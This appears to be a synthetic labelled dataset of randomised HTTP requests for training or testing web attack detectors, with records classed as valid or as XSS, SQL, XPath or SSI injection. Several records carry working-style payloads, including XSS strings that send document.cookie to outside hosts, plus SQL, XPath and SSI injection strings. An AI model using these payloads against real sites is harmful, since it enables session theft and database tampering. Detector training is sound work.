X-Serial-Number: 555023929683
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15726
Start - Id: 48256
class: XSS
PUT /dhigroup bytf2mBMpk/o.9FpDA/zMm/bUn28FQ26QnAq7/rfi1y8trxs5s8/lFprm5W/teellng9g2cuiOcaic/6P1wpF6TMs-Rmb6oT5iF.php? HTTP/1.1
Content-Length: 157
Content-Language: u,Wqnea
Content-Encoding: identity
Content-Location: http://oionotii.org/odTdc/n7gAEr/idedeel/sltme.cgi
Content-MD5: bm5FWDZyenJpZWVzdWFlZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 01 Dec 06 19:37:18 CET
Last-Modified: Sun, 25 Apr 10 24:43:13 GMT
Host: www.OskHan0.st
Connection: keep-alive
Accept: application/*, application/postscript;q=0.4, video/quicktime
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=16
Client-ip: 103.189.198.113
Cookie: he=<input  type    =    "image "  dynsrc    = " javascript:   [window.open('http://47.194.6.68/ve.asp'+document.cookie);]"   >;g4aslhcemoNovtw=kTr
Cookie2: $Version="3"
Date: Thu, 21 Dec 06 11:03:43 CET
ETag: "GyRoO6woP65L5RNAnX"
Expect: 100-continue
From: oslKrae@1ok4xdre.uk
If-Modified-Since: Mon, 02 Nov 09 11:09:58 CET
If-Unmodified-Since: Wed, 06 Jun 07 21:18:12 UTC
If-Match: *
If-None-Match: "gjv0N70QmsixFXh"
If-Range: "xqb_6.ZV2yEwemz"
Max-Forwards: 1500
MIME-Version: 1.4
Pragma: oixctlua='ehhipn'
Proxy-Authorization: NTLM ZUllc2VkZWhiY2l3MG40c09IdGhhaGVzNnlIYW1pNm85cmRhaWtu
Authorization: pthi nnai4l=Honcoon
Range: 9-39,892590-
Referer: /skwhffs/9ntutkr/acld/tnOrltea/nkrs.jsp
TE: gzip;q=0.6,trailers,gzip;q=0.8
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.0 (Machintosh; U; PPC Mac OS X 5.2; h1-co; rv:3.6.1) Gecko/31118862
UA-CPU: 68000
UA-Disp: 344,654,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 9341x017
Via: HTTP/8.4 128.232.155.43:52, HTTP/6.8 www.iks5drl.htm
Transfer-Encoding: compress
Upgrade: tRojr/4.8, ee1/5.0, lcc/3.4, ejHusz/1.8, ar0ma/1.4
Warning: 566 www.m8ftnm.shtml "ewDNnc" "Wed, 17 Jun 09 23:20:04 GMT"
X-Forwarded-For: 233.95.8.172
X-Serial-Number: 69101729504
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tuigonnoitnp4=ha&H@-htpassOT=53545035&drpe5ser=2235102&uHNezxBoWsecl=tetaeroIwtrr&E6=61&MqUnode8@F=eoo2dmn2i&na=bpObspowRL&ase3anrh=cerPoisltg&2rr4=zs3Jya4ta

End - Id: 48256
Start - Id: 41517
class: SqlInjection
PUT /ieeNaogrehc5a/P37XbIA-6Cpl/rFgsvKyVkt3dDCh_rM/oc6oK.asp? HTTP/1.1
Content-Length: 107
Content-Language: fl
Content-Encoding: compress
Content-Location: http://dosB.fr/eiya/iyjN/otmkmra/ri8lh/3ankM1u.mpeg
Content-MD5: aGVoc2lDMGx5cXRlaWFPZg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 10 Jul 09 01:36:50 CET
Last-Modified: Sat, 06 Oct 07 08:27:00 UTC
Host: www.br5evn.be
Connection: keep-alive
Accept: audio/*;q=0.2
Accept-Charset: *
Accept-Encoding: compress;q=0.1, gzip, compress;q=0.5
Accept-Language: trt-nnyoc2;q=0.7, dtetcae-2;q=0.5, wawtn-agi;q=0.0, tl6beodh-keg
Cache-Control: max-age=207
Client-ip: 78.241.99.85
Cookie: eeEW=i05j.;Ssreclt=p_m4V;oro4klislShp= h
Cookie2: $Version="16"
Date: Wed, 20 Jul 05 18:57:58 CET
ETag: "_vMH@4MNLWv9FY-"
Expect: maEbbf
From: pfpr@iosyoa.gov
If-Modified-Since: Fri, 11 Aug 06 08:21:48 GMT
If-Unmodified-Since: Tue, 15 Dec 09 12:46:48 GMT
If-Match: *
If-None-Match: "zhQtOCN1clAtH_d4pSbU"
If-Range: Thu, 23 Aug 07 19:29:15 CET
Max-Forwards: 13
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Basic ZkkyNTpucm9z
Authorization: war8dc vont=sei1
Range: -68
Referer: /qnvRna/sVlrihim/ernUteBe/neeqye/brdi6s7h.jpg
TE: chunked,chunked,trailers
Trailer: User-Agent
User-Agent: Mozilla/1.7 (X11; U; Open BSD i386 5.8; nl-tl; rv:2.4.6) Gecko/62045224
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 6912x601
Via: aMeig3/4.7 www.edelerkf.png, 0.7 179.93.126.143:9, naa/7.5 www.IeGes.html:6832
Transfer-Encoding: gzip
Upgrade: thce3c/8.9, 137aa/4.9, 5eyy/9.6
Warning: 403 68.147.161.49 "4oeh1aeq0hls" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

fhlplsnSebd=';    insert   into  et6     values(666,'twsst','eNIaq',0xfffff)&ny=e$7

End - Id: 41517
Start - Id: 48615
class: XPathInjection
POST /yniario/QGECDt3/yrLs/staxdtm/eJyMy3baD@.tiff? HTTP/1.1
Content-Length: 118
Content-Language: oateu,ld
Content-Encoding: identity
Content-Location: /riQGLPoo/jelrs/ReaN1itt/teht3nha.dll
Content-MD5: ZTFtc2h5ZWxlRWVvbXRzbw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 24 Jul 06 17:00:26 UTC
Last-Modified: Tue, 19 Dec 06 16:49:46 GMT
Host: 196.172.239.111:6
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: ey-ewl2gi, th-lomfbiue;q=0.6, ruFtva-a, n-t;q=0.4
Cache-Control: only-if-cached
Client-ip: 101.123.157.55
Cookie: sso=alyZPpBUO;C.CAqdwTYq5=ujtm3eera;eteuso9ogaesls=y3ggtsd;yltqxT=gZ6a
Cookie2: $Version="07"
Date: Fri, 20 Jul 07 19:28:17 UTC
ETag: W/"mGiU0sGqdzcOhhW"
Expect: 100-continue
From: nhWtansu@esndihS5y.biz
If-Modified-Since: Wed, 18 Jun 08 06:47:26 GMT
If-Unmodified-Since: Wed, 05 Jan 05 10:37:36 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 08 Oct 04 24:31:51 CET
Max-Forwards: 674
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Basic ZWVpVDpoZGVvc0Fz
Authorization: Basic c3hjcHU6ZWUyYWVz
Range: 3-574
Referer: /enNi/t6Tmalvr/eecey/bveatlw/jheieoe5.jsp
TE: trailers,gzip;q=0.9,trailers
Trailer: Referer
User-Agent: Mozilla/9.3 (Windows; U; Win 9x 9.4; hl-mi; rv:5.5.9) Gecko/67360543
UA-CPU: Sparc
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 090x151
Via: fssdh/6.8 www.jmeetos.gif, y4STrI/4.2 26.62.232.149
Transfer-Encoding: compress
Upgrade: 98segm/6.0, emke/7.4, V6urw/1.6, y7u/6.3, erasgo/2.6
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 3403720047412746
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

ddtreean=sIj7eoni'    or 6 <  count(path/child::*)  or     'xt3yreGt'    =  '&pABzEaSm9dta=@Xa

End - Id: 48615
Start - Id: 26005
class: Valid
GET /hTuMAuoAB/gJn/vvnwK.ZZxEcuIqTI.sh? HTTP/1.0
Host: www.tciAfe.cz:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: shift_jis, iso-8859-9;q=0.8, hz-gb-2312;q=0.3
Accept-Encoding: 
Accept-Language: 6i-e;q=0.9, 87miceI-1;q=0.0
Cache-Control: min-fresh=3414
Client-ip: 254.230.111.50
Cookie: no=cT6TTlhuGeaie;ljDEyIvq-or=i;RbWJ=hHvDSjpHgA;pewdeT=4
Cookie2: $Version="31"
Date: Thu, 30 Oct 08 04:19:04 GMT
ETag: W/"ANnuE.x-5w6Q52AxA"
Expect: hmrtyoF
From: okoN@InehtR.st
If-Modified-Since: Thu, 08 Oct 09 04:04:43 UTC
If-Unmodified-Since: Mon, 23 Nov 09 09:13:54 CET
If-Match: "zFxJ82Pf17u2bPPP"
If-None-Match: *
If-Range: Fri, 28 Dec 07 02:27:45 GMT
Max-Forwards: 144
MIME-Version: 9.6
Pragma: itio1l=8ee
Proxy-Authorization: Basic dHVhZHg6aEhFenJuZA==
Authorization: Digest nonce
Range: -22228,15-
Referer: /6nsGz/a32ifcu7/AedioWwl/eE6tir.swf
TE: trailers
Trailer: Expect
User-Agent: Mozilla/5.2 (compatible; Konqueror/1.5; Linux i386; tdfjhanozm; hahsSsn; nseelc)
UA-CPU: Sparc
UA-Disp: 3085,3643,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 8535x949
Via: 5.3 www.tniil.gif, eotp/7.7 www.geaN.png
Transfer-Encoding: gzip
Upgrade: yuk/5.7, RisS/8.9
Warning: 488 www.avaeexA.js:6581 "ocetwnostmfR" "Thu, 04 Oct 07 11:18:19 CET"
X-Forwarded-For: 77.185.209.175
X-Serial-Number: 767328268470976687
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26005
Start - Id: 651
class: Valid
GET /awlGUCCAB/r@BtLDdLUTzy-v2xP/wvjdattuioihewct/ms2iiarNaewEe/6-RDl/ewnxrssthxacaMTeoY/saubuu/TO/sAcnUsSA/qb_iPh0U-xN9.cgi?eo=91183379&ronHN=%2Fw&ymrheeebrtTee=88&mibicMyoe=lsebne HTTP/1.1
Host: www.eA7ha5.uk
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.1
Accept-Encoding: identity;q=0.5, identity, identity;q=0.2, compress, identity;q=0.6
Accept-Language: *;q=0.2
Cache-Control: min-fresh=37533
Client-ip: 98.101.91.241
Cookie: mh=iorleHlh
Cookie2: $Version="90"
Date: Wed, 15 Jun 05 12:09:25 GMT
ETag: "_-06.3ZfGm2Re50KsW"
Expect: vfdVhi4r
From: mCwLenl2@tzestpahnr.be
If-Modified-Since: Wed, 10 Sep 08 17:15:59 CET
If-Unmodified-Since: Sat, 21 Nov 09 13:17:14 CET
If-Match: "bpOR.f3f76df-Wex5"
If-None-Match: *
If-Range: *
Max-Forwards: 19
MIME-Version: 3.8
Pragma: uIl='s'
Proxy-Authorization: NTLM all0bmFoaXVuYWNhYW9yNG8xYXdFbnJ0YXloNXNhT3NyYmFCb2VleXQ=
Authorization: mtkpub oawuP=lorli
Range: -7,9185-99305,64-211014
Referer: /dlbk/o7dos.php3
TE: deflate;q=0.5,gzip;q=0.1,deflate
Trailer: If-None-Match
User-Agent: Mozilla/9.2 (Windows; U; WinNT 6.9; sv-yt; rv:7.3.0) Gecko/67772312
UA-CPU: x86
UA-Disp: 7551,458,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 1676x432
Via: 7.4 62.145.220.195
Transfer-Encoding: whhos
Upgrade: cIre/5.3
Warning: 822 www.doik.shtml:3 "omlq" "Sat, 28 Aug 04 02:17:50 UTC"
X-Forwarded-For: 170.17.150.153
X-Serial-Number: 541499677250739
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 651
Start - Id: 40909
class: SSI
GET /sPv41V-6QkQU7YlCHF/tzoe/njUEUSj/tkbrcgmSkreseNpCtron/o-kDbok0mAWX6nhD/yO_uVE0vTWV/em/sna.asp?htenLT=awuc&mruun=83405&eopettPOja=n5c&eseih70wey=zan&qi=%3EctDgvbscriptn2+c2w%3F%28toda&lodDogouZioia=egtehpn1ujeetrx&3mcsexura=y2&ddllastltyHf=ov+openedonenst&sA1A0jaua2aAee=4%401v2ZsNPG&t98nuReh7o=%3C%21--+%23odbc+++connect%3D%22eOpesc%2Cad5n%2C8el%22+++++++statement%3D%22select+*+from+++++bpg%22--%3E HTTP/1.0
Host: 203.75.104.228:3
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 71.125.45.144
Cookie: ghjonrfG5u=rcp-;HDLmail_fy9DEO=9;ZNBjPPGx=f57t4eheu;lRwuP21Ce=f0;FE4=oaRl;esuynexiaiqn=i9U3
Cookie2: $Version="3"
Date: Wed, 11 Jun 08 04:16:45 GMT
ETag: "4DOTsaKeuKe20mWmkYac"
Expect: 100-continue
From: 7tnz7e@rrkue5aod.it
If-Unmodified-Since: Mon, 14 Dec 09 16:12:57 CET
If-Match: *
If-None-Match: "XstJE9ZCTYnVm_eI"
If-Range: *
Max-Forwards: 770
MIME-Version: 7.3
Pragma: tddix='g2a'
Authorization: Digest response="28D7C190ae7D1084Fae9eBD8Bd12f6F4"
Range: -0350,3542-,-6
Referer: /tniyo/rfartRm.zip
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/3.9 (compatible; Konqueror/8.6; Linux i586; tnfe; tllNndcS)
UA-CPU: MIPS
UA-OS: Windows 95
UA-Color: color8
Via: 5.5 134.245.36.38, asay/6.6 223.189.100.48
Transfer-Encoding: identity
Warning: 086 61.20.174.151 "hej5T2phoa6l2adseC1t" 
X-Forwarded-For: 175.203.115.62
X-Serial-Number: 163741114628927
----: ------------------

null

End - Id: 40909
Start - Id: 48472
class: XPathInjection
GET /1NQ/PjMqYb8yWwV/etDV/oEd2/JrnhgiWtytMozaw/aAbfIeN4/lT7o-u.html?bsttchrl=%29+tperlr&Upassthrujrdropfkp=cfnbi2&ahcuayu=90712&6e1j6hofasctnt=bafhcebsr9e&rIraHpaEsou=72723985&.JI0WRwKN9=olibten&yOsSwtnc=001&cwi5upiLo1ee=3690&eAJb5Q7QjautoexecU0=t4jXHQv4&nhitoanhoinadri=921&qxdQuq=ngc10ia8ahr0i4 HTTP/1.0
Host: www.tsUDsw.org
Connection: keep-alive
Accept: video/*;q=0.6, image/*;q=0.7, audio/basic;q=0.2
Accept-Charset: iso-8859-8;q=0.4, us-ascii, x-mac-chinesetrad;q=0.3, utf-7
Accept-Encoding: *;q=0.9
Accept-Language: nb8xen-aEhnH;q=0.1, erstvt-m6Tf;q=0.3
Cache-Control: no-cache
Cookie: efeioieuo9=0t'     or  (i  <    count(eej/child::text())     and   j     < count(h7/child::comment())     and     k  < count(imsr/child::*)   )    or '9Reshrat'    =   ' ar'  or
Date: Wed, 04 Apr 07 02:07:05 GMT
Expect: epenp
If-Modified-Since: Mon, 18 Jun 07 18:16:31 UTC
If-Match: "2qxLlEy.INXCoLaT"
If-None-Match: *
If-Range: *
Max-Forwards: 8920
Pragma: no-cache
Authorization: Basic dDBrcGh0REI6dW10cnNhYg==
Referer: http://www.oggoI.org/tteeNf/cbjoiii/ahE4imd/eure.mdb
User-Agent: Mozilla/3.8 (compatible; Konqueror/7.6; Win98; gbhubhrhem; m4oJ; hlNLohee)
Via: rsa/1.5 www.arnY.png, Tbel/7.7 120.136.94.200:036, 4.3 www.eegef.png

null

End - Id: 48472
Start - Id: 47440
class: XSS
GET /u1ceinhogArcosg/5E/atut0adi/eTy_Z1dp.@8kI/ejeAestiscScmri.shtml?h0j5rmuntnd=eQq_J5K3i8&eieNyl=%3Cimg+++++src++%3D%22+++++javascript%3A+%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.llnatees.com%2Fcgi-bin%2Fitie.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22%3E&qt7XzkSf=39963&feuWTUxl8bet=96469689&lgtOkq=2&Xstylepassthruz=u0aErd23easystemv&341X3H=soleein&OxaLzERMF=7mi%3Clt&UFMhsC=44643995 HTTP/1.0
Host: 231.40.160.158
Connection: keep-alive
Accept: video/mpeg;q=0.5
Accept-Charset: koi8-r;q=0.2, euc-cn;q=0.4, windows-1251, x-mac-turkish;q=0.6, iso-8859-5;q=0.0
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-store
Client-ip: 33.233.160.141
Cookie: NoAaauraecjS=5home;nang=849;tandDoa=cFaa;6Qtwgrenvr4rlyt=qd iionreaesbgsoundtiglrlocation;toozsaao=8414179
Cookie2: $Version="05"
Date: Fri, 23 Feb 07 17:13:00 GMT
ETag: W/"USbOQLZFotY12CP"
Expect: 100-continue
From: desfe5rt@owenslwi5e.org
If-Modified-Since: Sat, 07 Apr 07 17:33:18 GMT
If-Unmodified-Since: Tue, 10 Feb 09 14:23:35 GMT
If-Match: "cr9wjUcukfFuJApk9"
If-None-Match: "ZEUrbeVXm3Sqm9xf"
If-Range: "fh1PCEaiE4Uch-v"
Max-Forwards: 898
MIME-Version: 1.7
Pragma: sEbt='fq'
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM SGVlaWl0eXR0aGlhMHBvZTVDYW1vb3VyY2FwNTZ0dE9Jc3ljbHp0cm55aWl5YWVz
Range: 13744-31405
Referer: http://www.a3iWilu.org/wTts6trl.rar
TE: chunked;q=0.3,trailers,trailers
Trailer: If-Range
User-Agent: Iu08ss/9.2.0
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 644x740
Via: 3.6 www.5orevyr.png:07, 4.9 www.urHyuh.htm, 5.6 117.197.231.210
Transfer-Encoding: Arhg9
Upgrade: ipodo/1.3, Abos/3.0, rwucs/0.4, xtsw4a/6.8
Warning: 281 www.x8r0s.tiff "js1edtagecg" "Sat, 28 Jul 07 11:01:34 UTC"
X-Forwarded-For: 217.98.75.84
X-Serial-Number: 31680375275
----: -----------
~~~~~: ~~~~~~~~~~

null

End - Id: 47440
Start - Id: 19043
class: Valid
GET /xT1RQ3m/eqeanersiEhre31/Tr/axIliWeoE0enXersp4qe/3dsdbaae.sh? HTTP/1.1
Host: www.7neibo.gov
Connection: remal
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.6, compress, gzip;q=0.7
Accept-Language: IaYmcuoh-EimmaI;q=0.7, ttc-tn, oae-te7Sxux;q=0.5, nonnr-e8;q=0.2
Cache-Control: min-fresh=06
Client-ip: 76.12.148.135
Cookie: isJmoWm=48;GLARD=7
Cookie2: $Version="445"
Date: Thu, 21 Apr 05 16:32:17 UTC
ETag: W/"ScEfWr5x08Nkz8UuRZ5"
Expect: ytjt=tuxoywd
From: meOreslm@oakuitLO.de
If-Modified-Since: Wed, 26 Mar 08 07:05:47 UTC
If-Unmodified-Since: Sun, 04 Apr 10 04:47:16 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 18 Dec 06 10:15:01 UTC
Max-Forwards: 5
MIME-Version: 8.2
Pragma: elebh='eae'
Proxy-Authorization: NTLM Zm5yeW84TmZhZm9hYWl0c3N0OW5pNm4zZDd2ZnBkaGZuZWxtTmV2cnlhY3Ju
Authorization: Digest uri=/dkaitwe2/leath/teBry/ntdhjwz/ll1r.png
Range: 851710-
Referer: http://www.iCsnil.biz/bRadhb/soie.gif
TE: chunked;q=0.6
Trailer: If-Match
User-Agent: 9cjwne1ohO
UA-CPU: MIPS
UA-Disp: 7710,898,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 470x6702
Via: 7.7 225.126.170.41, HTTP/0.2 166.31.71.36, 7.9 155.230.71.239
Transfer-Encoding: identity
Upgrade: e60/6.4, Dojen/4.5, 8latt/8.3
Warning: 355 www.Bdu6e.shtml "ia7hunlei" "Tue, 18 Dec 07 20:23:22 CET"
X-Forwarded-For: 210.182.2.227
X-Serial-Number: 2525148777282
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 19043
Start - Id: 3491
class: Valid
GET /szKYsPzB-nN35Tm/rWDzB.dqzXw/boasi1dneeeesn4dea0d/ttt/o0JwLD03/Vreplace96HmEIN.jpeg?uhtfD=9052&TreeiAdwj=d6lTy&ccPTPh=omovGlhfs&A8mail6=6escripteiT+h&C.catbs-=w&auansoUaeyd3st=d%3AFNhjpehctoeistmp%3Ch&tiemenn=m HTTP/1.1
Host: www.oaaUitoHtD.ch
Connection: asrnf
Accept: audio/basic;q=0.9, application/*;q=0.0, audio/*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 247.57.253.1
Cookie: trltTr7lrreox=vsxn7eh;Tbetweenioptkscriptr=7;3xlt0trbtihfe=40439;ItSOeooe=oelaoa$+s
Cookie2: $Version="81"
Date: Sat, 24 Sep 05 08:01:05 GMT
ETag: W/"TaJ66g7u_LVS2h9cC"
Expect: 100-continue
From: uxKbis@erSpeat.org
If-Modified-Since: Thu, 08 Jul 04 16:13:44 CET
If-Unmodified-Since: Mon, 13 Aug 07 13:18:43 CET
If-Match: "F@@DS3g66322JyoJv"
If-None-Match: *
If-Range: *
Max-Forwards: 87
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: rAato htiogism=9fjscet
Range: 2754-,-42,333635-
Referer: /slaeotuw/exoEq.cgi
TE: trailers
Trailer: Authorization
User-Agent: iaeE6e (ulHoUGkCw)
UA-CPU: x86
UA-Disp: 7333,3930,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 505x3714
Via: 8.8 77.159.247.227
Transfer-Encoding: wp9iDl
Upgrade: inat/2.9, rRci/3.1
Warning: 330 47.121.195.196 "o9daseccs5doattoiw" "Sat, 18 Oct 08 15:22:02 CET"
X-Forwarded-For: 175.189.142.174
X-Serial-Number: 8528165138107530
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 3491
Start - Id: 3103
class: Valid
GET /tOI.@N/wamJpqxHH6Qgcn/hUL9pdmtyr/dv0r/e_u2ZBVyPY/f5Ldrs/M8/4mvY3/u0ERVZCL/idtt2aMtclie5/E6Wkd/lkjtZ2I.swf?tHw=8668070 HTTP/1.1
Host: www.bcrEt.ch:80
Connection: close
Accept: audio/*;q=0.5
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=95037
Client-ip: 178.122.130.175
Cookie: bteuAHtnteeetU8=i0A;dIew82imnvcsf=sNW;ddegrs19eitn=window.openftpc;ramiooeis8ni=330393;htlolsRtdrmi=676
Cookie2: $Version="306"
Date: Fri, 06 Jun 08 17:52:03 UTC
ETag: "4Ll0_82lrVtR2rBjtA"
Expect: elratie
From: elot@iettrDhpp.gov
If-Modified-Since: Wed, 23 Nov 05 21:35:13 GMT
If-Unmodified-Since: Sat, 06 Nov 04 10:00:02 CET
If-Match: "glP6@51npR_Y9kSy2LNR"
If-None-Match: "UU9SPYiGKcQrfzeK.xL"
If-Range: Tue, 01 Apr 08 05:25:36 UTC
Max-Forwards: 6
MIME-Version: 3.5
Pragma: atwnl='e'
Proxy-Authorization: Basic ZHZnZDo3c2F3YXM=
Authorization: Basic dGlhbmJ3OnRkc283OWY=
Range: 8-53,59566-35,-6851
Referer: http://9ys5p.com/j9sns/ruswhvea/Yo0O3ye/aisiedA.txt
TE: gzip,deflate,deflate
Trailer: Upgrade
User-Agent: Mozilla/6.1 (compatible; Konqueror/1.6; WinNT; asiiP; Fruitp; haTinbfhe)
UA-CPU: MIPS
UA-Disp: 3610,5724,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 3082x5034
Via: 9.8 98.192.179.92, 5.5 www.st9aal.html
Transfer-Encoding: deflate
Upgrade: 6te/4.3, reiog/2.9, ctnoo0/7.3, hxHaad/5.5, ldtkhe/8.4
Warning: 690 25.36.240.58 "khpSxlij80Psteslo" "Tue, 28 Oct 08 11:10:05 CET"
X-Forwarded-For: 240.223.9.140
X-Serial-Number: 50270
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3103
Start - Id: 4915
class: Valid
POST /@zA0zx/iP_/j321OQs4XAtmpXkk/L8bR/@NvusrcxpIiql8nscript/i2OmLygB64z-dL-hjshR/v5FmQj/mb_-qRQM8M2ua/ezo2saesi3sR/DOLCocwget-BAmER1.js? HTTP/1.0
Content-Length: 181
Content-Language: e
Content-Encoding: compress
Content-Location: /eferdUl/jn4ldiL/seKyei.fgf
Content-MD5: b2l0dGJlZWhycmhodG0xbg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 16 Mar 10 06:09:34 UTC
Last-Modified: Thu, 15 Apr 04 10:14:06 CET
Host: 79.97.17.22
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: gzip
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 165.127.88.109
Cookie: qEgohee=ac;6b=qa1delete7;hqL42inpImkiq=Tu nt;Hsdc=41488;niaysoiidtoulwc=9802995984;qldT29tqmr=3tdlIRtIejsrh5rfet
Cookie2: $Version="1"
Date: Sun, 26 Jun 05 09:16:19 UTC
ETag: W/"oz7H7O1v7SSfqgo7H@R8"
Expect: 100-continue
From: osuu@ioeO.org
If-Modified-Since: Wed, 10 Oct 07 20:23:54 GMT
If-Unmodified-Since: Sat, 03 Apr 04 09:15:27 CET
If-Match: *
If-None-Match: "5suLSKCK7dr6mhP"
If-Range: Tue, 05 Sep 06 22:40:59 CET
Max-Forwards: 46
MIME-Version: 8.8
Pragma: es=4uT
Proxy-Authorization: Digest nc=eFb2E0C2
Authorization: Basic ZW5lamU0YTprdHg1czU=
Range: 0401-,-401,485260-5
Referer: http://www.9mnis4.gov/tm6l/d1amzs.swf
TE: chunked;q=0.9
Trailer: Connection
User-Agent: aiHeh7swmehwfGsucc
UA-CPU: x86
UA-Disp: 979,352,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5493x774
Via: tEipa/8.7 www.f2tp51n.gif, rOekR/3.9 175.107.42.72:16281, 6.5 www.IoaglisE.tiff:67
Transfer-Encoding: identity
Upgrade: dnb/4.0
Warning: 222 www.oeeeay.gif:8841 "nriml4ld" "Mon, 28 Aug 06 16:14:52 GMT"
X-Forwarded-For: 89.218.230.173
X-Serial-Number: 074898
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

c8fmcpa7=c8s&wsRYeesGaria=7sss&lso0hu5s=7&xeClenos8o=e c&nhrdiei5Mriiu=Rnroindhoab3kscnv&oeSslszncatnfo=nl6i&l1oRzweu=3615149&bwtsieloee7=pqY55.1E5SP&asesf6b=ebtolunIdivretsptmpefol

End - Id: 4915
Start - Id: 1120
class: Valid
GET /nzAcw_U9mBK/wVvcf0/warseeTwaplzrket/sTQfamdEqPGRWwt/avXAKsFgBS.pl? HTTP/1.1
Host: 254.220.208.188
Connection: oQejeift
Accept: */*;q=0.8
Accept-Charset: x-mac-ce, macintosh, koi8-r;q=0.1, iso-8859-1, macintosh
Accept-Encoding: 
Accept-Language: faii5-my43Suv;q=0.9, 6ir-ei;q=0.6, itushnid-dl, latnh2Ie-N, nefd-lolIh
Cache-Control: no-cache
Client-ip: 179.209.57.142
Cookie: moueiiT=3639;ra=785835;q4SgxUexecY7iHb=e=phpsamos ;body77dvV6=ijR
Cookie2: $Version="1"
Date: Mon, 17 Apr 06 04:38:18 CET
ETag: "9.8uWdp@rqIR@bt4Dd6"
Expect: 100-continue
From: hsrtboi@onni.cz
If-Modified-Since: Fri, 05 Sep 08 04:09:49 CET
If-Unmodified-Since: Fri, 29 May 09 01:42:59 GMT
If-Match: *
If-None-Match: "GOsXReGap-PUu5g"
If-Range: *
Max-Forwards: 9908
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: 1roecw ynJns=ailepj5
Authorization: NTLM MXJ0aGljZWt3ekd0bHZycjNtcG50ZWVpbk5yQXN0ZW5hcWE=
Range: 634551-,48052-6687,-9
Referer: /icneus/eeao/nhAaen0e.asp
TE: deflate
Trailer: Transfer-Encoding
User-Agent: gsvmyi/7.3.0.3.8
UA-CPU: 68000
UA-Disp: 504,2036,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 269x251
Via: etsY/1.9 75.234.225.30:181, FTP/1.2 www.Eobu8Oy.gif
Transfer-Encoding: compress
Upgrade: nwt/2.1, 9Anoe/4.1, tte/7.6, oIr/1.1, 0rasra/0.1
Warning: 737 144.157.19.107 "tuN5hTIzo9baaeA" 
X-Forwarded-For: 194.217.109.144
X-Serial-Number: 704934
----: -----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 1120
Start - Id: 15541
class: Valid
GET /itIQui/ga/9ty2NeOmn/ea.nsf? HTTP/1.0
Host: www.cxaht6thad.biz:80
Connection: close
Accept: audio/*;q=0.8, audio/basic
Accept-Charset: *;q=0.4
Accept-Encoding: identity;q=0.8, compress;q=0.6
Accept-Language: gohbs-eo;q=0.3
Cache-Control: no-store
Client-ip: 76.8.129.40
Cookie: nirr3h3=input\eN;cesHaed=6765798726;d2ka=eXcraY
Cookie2: $Version="7"
Date: Tue, 28 Aug 07 03:44:35 UTC
ETag: "n4Fg4iQjH5.Po5uiNX"
Expect: 100-continue
From: ed7i4h@cdlya.cz
If-Modified-Since: Sun, 19 Feb 06 13:32:57 UTC
If-Unmodified-Since: Mon, 18 May 09 19:31:06 GMT
If-Match: *
If-None-Match: *
